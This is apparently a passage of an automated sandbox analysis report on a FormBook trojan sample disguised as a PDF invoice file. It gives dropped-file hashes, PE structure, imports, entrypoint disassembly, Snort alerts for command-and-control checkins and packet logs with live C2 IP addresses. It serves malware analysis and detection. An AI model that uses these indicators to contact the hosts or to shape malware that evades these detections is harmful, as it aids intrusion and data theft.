SHA1: 519B7075E47497CB94E28808C8D47DA194894FA1
SHA-256: 306DCF3EF4DBEE61EA91FF787766B702E9805A96621EB75691E4A879A9A50C0D
SHA-512: 5A0D8BA54187CE1F6692143FACC7773A7F1C3415FFB822F54067961CFD311877E71147D0A64130C624D664940BE56907147CFB4853E79F8FCEE4BC48434723E2
Malicious: false
Reputation: low
Preview: |..8....cE=L...0......\$nU..n.'iY,.I...j..Q..!...q9..V...f*.fnj.A..Un..<.~R....CC*..,c..|\4..5.h+.U.......Q.>.+..k..|.`^iS.....uV.L...~.L...............K.:...[..."b..1.XHt.....,6.<....'.X..w|w.......$(..@.L.{d3.....)..)..yO,....8Oo...;._L..z....eF_./...=....D.P...M..4.U....%5.X(...&..2..!...D..a..r.z-.2.I....r..*d....A.2....~&[.hk...M..v*)P.....Ff.G......vM?;J1a.....$....2...r*.bF...h.l.~..$-Lc..}aj.u......&.,.6.].-S..\e..+.D....ge..;. ....$.&"..'r...P.c.5._...ls.+....5}....N.[(.T.k...`...p..u.i....b....y;..".k..\H.1.q+...I.5X..x...=.j.tiV...MC.I.k...=....mGh.....}.s.M.N..0....\..".]`.t.F.*~.t.......X../.-X..Sq.HPk+_.x.nv..).....K..._a..m....N..<.....i..B.(.`}.\F.m.........W:1.W.0Z...<.......0..i,|.....k...M...(n...w\.7..{V..D.{.].....`.t`.HBz..".......7Z..p..u^.."2..O.._....EE....Ji.........H.x..aD...`/.qy.......!.6L.@3....}.F.-"..!....M.T.u....E......H!5M..A...pk./.....J....._..>>.T{,.....Dv!...O_9..4}H........l./.U.8..K#..4O...rh`^<....Ma`DI_..
                                                                      C:\Users\user\AppData\Local\Temp\dax13un2d6
                                                                      Process: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type: data
                                                                      Category: dropped
                                                                      Size (bytes): 6661
                                                                      Entropy (8bit): 7.956656063967567
                                                                      Encrypted: false
                                                                      SSDEEP: 96:RKgkqsL2kJtjh68QB/riIEfOnL5sYoKP3BRO1PKd/S9chyHhfJ60WMLRFG/0sxYw:RDkqsNHG/cmnL5suvBROewQ4vLY0UsA
                                                                      MD5: 30B449A67F91AF95CA2D7F6724868805
                                                                      SHA1: 7AB0F79DC27576D0B670D1F0CA62827DF08C95C2
                                                                      SHA-256: 35BF779A878919C60AABBFB59E9DD2935ACFB560B47C2DD6798535BDF1A27DD2
                                                                      SHA-512: 087C45FDC0A3998CE02B9F23F90D0BF38F2E1F904B2785D93F8A992B392F91B255901B1558430FBEBFE8C3178E460FF7F9A3D2641DE644AA532929B11B112A05
                                                                      Malicious: false
                                                                      Reputation: low
                                                                      Preview: a.mw;v....C.........8...'.....5........@.y<5.P....K..&....Q.....!*..t7.+.K......Z.\....2Y.....aP.4)=A].......W..._.....KRJ.p8.h...5..K.....2...N..6D.R.\^b.`...E.s... .n.l........."..\....do...P.M.....L..j..=..~.@n..}...'9..2..t.O.D.uaUsk]4../........t.l.z[...k/...g.l..D..=.(.9..<?.-...REj...[Wf....y.6pP...T.ot.z..l.n...?.>l.n....Ph%n...Q8....P..6.o..s..d.....hU-...`..O.LV.jC9b..............|<..!...=}. _..F`.'..A......u4.k..q...7s..Q..'I..Be{...83.iy..].8Ax... .d.t.~..qu'L....|[..?..1\...h.=.N..b./.z.7*.....Z..Q..~[..-.W..`...rVL...zQ...S*.wg..KI)...........M6.0.:.M.q.q8/.*...9.."....Ko...d[.r. 4F..4g.T}..v.l....%)....N.T.p...>|.y..r..=....nI....C...$....L..BLl....*0.h.M.&a..b.J....M/..@n).}.......!.....Y[.._...y.....B.....v.....<.Im."....B.V..Ly..&.F.P9....1C......4z.Xl.5..O.o..R.7...$...R.5..J"..Y.jM..Qo..nR.`..~9.W.....3T...#QE9...U..#....o(.....K....N........M....vn".I.`.k.;^....H.......\....#..:Pj.C<.y....Q.B.Qz.=...K...
                                                                      C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                      Process: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category: dropped
                                                                      Size (bytes): 5120
                                                                      Entropy (8bit): 4.185149071228919
                                                                      Encrypted: false
                                                                      SSDEEP: 48:StV2Zq6NN8MD5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqSgSnM:oRo5yZUGXHBgVueKxbSM
                                                                      MD5: BA2AD591CE772A5D280C3F20D6A42998
                                                                      SHA1: CA6C574F5F1CB219754EA06459B3039E96A2D6C9
                                                                      SHA-256: 5EB2CA7EF67E0748B9ED095660F89B0FE7972C30CB06F56D05E75C0899305831
                                                                      SHA-512: 7C193F004FF41411E9F68A592EF9E2C34EA67F8B5C4F866A1E1EEEB7385E0151DD8ECBBFBA0B1485222323DFD6836F69C5CDFDA5B4CD927B7D42FA9F1DEB115D
                                                                      Malicious: true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 23%
                                                                      Reputation: low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...JEn`...........!......................... ...............................`............@......................... !..T...`".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..0.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit): 7.33175373329671
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name: RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      File size: 397431
                                                                      MD5: 98f9ea244308bb5969ea3c302c32efcd
                                                                      SHA1: 82a913894418af7834d23bc543eb286230d4edf4
                                                                      SHA256: cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
                                                                      SHA512: c300afa9a46ca0c9d12c395c90c7bcd1950513780d4fd3775525a4f431319e16504ee3ee2411050a48810b94eb29f3c9ee84ad8c6efd2460280c7091a5923847
                                                                      SSDEEP: 6144:Dd9stvLGtELbMUTKZXQOnn7UGV5wD3hbCQ0Ga7BjHVLF7R:bSityjKzn7Uw5wD3hbQBRFN
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....<.....J1.....

                                                                      File Icon

                                                                      Icon Hash: 929296929e9e8eb2

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint: 0x40314a
                                                                      Entrypoint Section: .text
                                                                      Digitally signed: false
                                                                      Imagebase: 0x400000
                                                                      Subsystem: windows gui
                                                                      Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:
                                                                      Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major: 4
                                                                      OS Version Minor: 0
                                                                      File Version Major: 4
                                                                      File Version Minor: 0
                                                                      Subsystem Version Major: 4
                                                                      Subsystem Version Minor: 0
                                                                      Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 0000017Ch
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      xor esi, esi
                                                                      push edi
                                                                      mov dword ptr [esp+18h], esi
                                                                      mov ebp, 00409240h
                                                                      mov byte ptr [esp+10h], 00000020h
                                                                      call dword ptr [00407030h]
                                                                      push esi
                                                                      call dword ptr [00407270h]
                                                                      mov dword ptr [007A3030h], eax
                                                                      push esi
                                                                      lea eax, dword ptr [esp+30h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push esi
                                                                      push 0079E540h
                                                                      call dword ptr [00407158h]
                                                                      push 00409230h
                                                                      push 007A2780h
                                                                      call 00007FA370EE84D8h
                                                                      mov ebx, 007AA400h
                                                                      push ebx
                                                                      push 00000400h
                                                                      call dword ptr [004070B4h]
                                                                      call 00007FA370EE5C19h
                                                                      test eax, eax
                                                                      jne 00007FA370EE5CD6h
                                                                      push 000003FBh
                                                                      push ebx
                                                                      call dword ptr [004070B0h]
                                                                      push 00409228h
                                                                      push ebx
                                                                      call 00007FA370EE84C3h
                                                                      call 00007FA370EE5BF9h
                                                                      test eax, eax
                                                                      je 00007FA370EE5DF2h
                                                                      mov edi, 007A9000h
                                                                      push edi
                                                                      call dword ptr [00407140h]
                                                                      call dword ptr [004070ACh]
                                                                      push eax
                                                                      push edi
                                                                      call 00007FA370EE8481h
                                                                      push 00000000h
                                                                      call dword ptr [00407108h]
                                                                      cmp byte ptr [007A9000h], 00000022h
                                                                      mov dword ptr [007A2F80h], eax
                                                                      mov eax, edi
                                                                      jne 00007FA370EE5CBCh
                                                                      mov byte ptr [esp+10h], 00000022h
                                                                      mov eax, 00000001h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x2f05b | .rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                      Sections

                                                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                      .text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc | 0x3ac000 | 0x2f05b | 0x2f200 | False | 0.36241089191 | data | 6.22523060047 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      Name | RVA | Size | Type | Language | Country
                                                                      RT_ICON | 0x3ac310 | 0x709e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                                                      RT_ICON | 0x3b33b0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 318767104, next used block 117440512 | |
                                                                      RT_ICON | 0x3c3bd8 | 0x94a8 | data | |
                                                                      RT_ICON | 0x3cd080 | 0x5488 | data | |
                                                                      RT_ICON | 0x3d2508 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 117440512 | |
                                                                      RT_ICON | 0x3d6730 | 0x25a8 | data | |
                                                                      RT_ICON | 0x3d8cd8 | 0x10a8 | data | |
                                                                      RT_ICON | 0x3d9d80 | 0x988 | data | |
                                                                      RT_ICON | 0x3da708 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                      RT_DIALOG | 0x3dab70 | 0x100 | data | English | United States
                                                                      RT_DIALOG | 0x3dac70 | 0x11c | data | English | United States
                                                                      RT_DIALOG | 0x3dad8c | 0x60 | data | English | United States
                                                                      RT_GROUP_ICON | 0x3dadec | 0x84 | data | |
                                                                      RT_MANIFEST | 0x3dae70 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                      Imports

                                                                      DLL | Import
                                                                      KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                      USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                      GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                      SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                      ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                      COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                      ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
                                                                      VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                      Possible Origin

                                                                      Language of compilation system | Country where language is spoken | Map
                                                                      English | United States |

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                      04/08/21-13:22:17.851992 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      04/08/21-13:22:17.851992 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      04/08/21-13:22:17.851992 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      04/08/21-13:22:23.881720 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      04/08/21-13:22:23.881720 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      04/08/21-13:22:23.881720 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      04/08/21-13:22:50.107975 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49772 | 80 | 192.168.2.4 | 35.246.6.109
                                                                      04/08/21-13:22:50.107975 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49772 | 80 | 192.168.2.4 | 35.246.6.109
                                                                      04/08/21-13:22:50.107975 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49772 | 80 | 192.168.2.4 | 35.246.6.109
                                                                      04/08/21-13:22:55.232579 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49774 | 80 | 192.168.2.4 | 34.102.136.180
                                                                      04/08/21-13:22:55.232579 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49774 | 80 | 192.168.2.4 | 34.102.136.180
                                                                      04/08/21-13:22:55.232579 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49774 | 80 | 192.168.2.4 | 34.102.136.180
                                                                      04/08/21-13:22:55.347369 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49774 | 34.102.136.180 | 192.168.2.4
                                                                      04/08/21-13:23:23.204497 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                                                      04/08/21-13:23:24.222015 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8
                                                                      04/08/21-13:23:26.237204 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.4 | 8.8.8.8

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                      Apr 8, 2021 13:22:07.208076954 CEST | 49751 | 80 | 192.168.2.4 | 66.96.161.160
                                                                      Apr 8, 2021 13:22:07.318911076 CEST | 80 | 49751 | 66.96.161.160 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:07.319055080 CEST | 49751 | 80 | 192.168.2.4 | 66.96.161.160
                                                                      Apr 8, 2021 13:22:07.319251060 CEST | 49751 | 80 | 192.168.2.4 | 66.96.161.160
                                                                      Apr 8, 2021 13:22:07.437031031 CEST | 80 | 49751 | 66.96.161.160 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443166971 CEST | 80 | 49751 | 66.96.161.160 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443207026 CEST | 80 | 49751 | 66.96.161.160 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:07.443396091 CEST | 49751 | 80 | 192.168.2.4 | 66.96.161.160
                                                                      Apr 8, 2021 13:22:07.443444014 CEST | 49751 | 80 | 192.168.2.4 | 66.96.161.160
                                                                      Apr 8, 2021 13:22:07.554378986 CEST | 80 | 49751 | 66.96.161.160 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:17.702614069 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851721048 CEST | 80 | 49764 | 162.241.244.61 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:17.851872921 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:17.851991892 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:17.994587898 CEST | 80 | 49764 | 162.241.244.61 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:18.359489918 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:18.542831898 CEST | 80 | 49764 | 162.241.244.61 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669209003 CEST | 80 | 49764 | 162.241.244.61 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669230938 CEST | 80 | 49764 | 162.241.244.61 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:18.669306040 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:18.669331074 CEST | 49764 | 80 | 192.168.2.4 | 162.241.244.61
                                                                      Apr 8, 2021 13:22:23.712862968 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881352901 CEST | 80 | 49770 | 107.178.142.156 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:23.881531954 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:23.881720066 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:24.249051094 CEST | 80 | 49770 | 107.178.142.156 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:24.391254902 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:24.557790995 CEST | 80 | 49770 | 107.178.142.156 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418097019 CEST | 80 | 49770 | 107.178.142.156 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418112040 CEST | 80 | 49770 | 107.178.142.156 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:27.418188095 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:27.418340921 CEST | 49770 | 80 | 192.168.2.4 | 107.178.142.156
                                                                      Apr 8, 2021 13:22:44.781671047 CEST | 49771 | 80 | 192.168.2.4 | 199.59.242.153
                                                                      Apr 8, 2021 13:22:44.891897917 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:44.892003059 CEST | 49771 | 80 | 192.168.2.4 | 199.59.242.153
                                                                      Apr 8, 2021 13:22:44.892147064 CEST | 49771 | 80 | 192.168.2.4 | 199.59.242.153
                                                                      Apr 8, 2021 13:22:45.002394915 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002899885 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002926111 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002974033 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.002993107 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003007889 CEST | 80 | 49771 | 199.59.242.153 | 192.168.2.4
                                                                      Apr 8, 2021 13:22:45.003110886 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003139019 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:45.003252983 CEST4977180192.168.2.4199.59.242.153
                                                                      Apr 8, 2021 13:22:50.074331045 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107506990 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.107790947 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.107975006 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.139882088 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173912048 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.173933983 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:50.174128056 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.174240112 CEST4977280192.168.2.435.246.6.109
                                                                      Apr 8, 2021 13:22:50.206252098 CEST804977235.246.6.109192.168.2.4
                                                                      Apr 8, 2021 13:22:55.219860077 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232299089 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.232404947 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.232578993 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.245090008 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347368956 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347384930 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:22:55.347610950 CEST4977480192.168.2.434.102.136.180
                                                                      Apr 8, 2021 13:22:55.361360073 CEST804977434.102.136.180192.168.2.4
                                                                      Apr 8, 2021 13:23:00.419142962 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599010944 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.599234104 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.599381924 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.779186964 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805794001 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805819988 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:00.805941105 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.806032896 CEST4977680192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:00.985886097 CEST8049776184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.522414923 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701513052 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.701639891 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.701818943 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.880739927 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904542923 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904571056 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:06.904774904 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:06.904892921 CEST4977780192.168.2.4184.168.131.241
                                                                      Apr 8, 2021 13:23:07.083766937 CEST8049777184.168.131.241192.168.2.4
                                                                      Apr 8, 2021 13:23:11.994615078 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.006978989 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.007117987 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.007415056 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.019741058 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111870050 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111903906 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111923933 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111938953 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.111954927 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112023115 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112061024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112114906 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112117052 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112144947 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112189054 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.112226009 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112243891 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.112293959 CEST4977880192.168.2.4216.239.36.21
